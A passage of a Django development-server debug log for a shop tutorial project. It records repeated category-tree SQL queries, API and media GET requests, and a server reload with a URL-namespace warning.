"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:31:00,024 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:31:00,026 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:31:00,030 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:31:00,032 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:31:00,034 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:31:00,036 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:31:00,038 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:31:00,042 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:31:00,044 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:31:00,046 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:31:00,048 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:31:00,051 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:31:00,053 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:31:00,056 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:31:00,058 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:31:00,060 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:31:00,063 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:31:00,065 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:31:00] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 07:31:00] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [27/Dec/2019 07:31:00] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 DEBUG 2019-12-27 07:31:01,180 utils 31843 140533074753280 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-27 07:31:01,185 utils 31843 140533074753280 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [27/Dec/2019 07:31:01] "GET /api/v1/fire/ HTTP/1.0" 200 482 [27/Dec/2019 07:31:01] "GET /media/products/2019/12/05/SampleGIFImage_350kbmb_vsJs0Zd.gif HTTP/1.0" 200 355854 [27/Dec/2019 07:31:01] "GET /media/products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg HTTP/1.0" 200 3039441 [27/Dec/2019 07:31:01] "GET /media/products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg HTTP/1.0" 200 3337046 /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/middleware.py changed, reloading. Performing system checks... December 27, 2019 - 07:27:53 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-12-27 07:33:14,146 utils 32059 139875734529792 (0.004) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-27 07:33:14,151 utils 32059 139875734529792 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-12-27 07:33:41,406 utils 32059 139875701085952 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:33:41,422 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:33:41,428 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:33:41,432 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:33:41,438 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:33:41,442 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:33:41,446 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:33:41,449 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:33:41,453 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:33:41,460 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:33:41,466 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:33:41,470 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:33:41,474 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:33:41,478 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:33:41,484 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:33:41,488 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:33:41,492 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:33:41,496 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:33:41,500 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:33:41,506 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:33:41,510 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:33:41,514 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:33:41,518 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:33:41,522 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:33:41,526 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:33:41,533 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:33:41,536 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:33:41,540 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:33:41,544 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:33:41,548 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:33:41,554 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:33:41,557 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:33:41,561 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:33:41,565 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:33:41,569 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:33:41,575 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:33:41,580 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:33:41,584 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:33:41,588 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:33:41,592 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:33:41,596 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:33:41,601 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:33:41,605 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 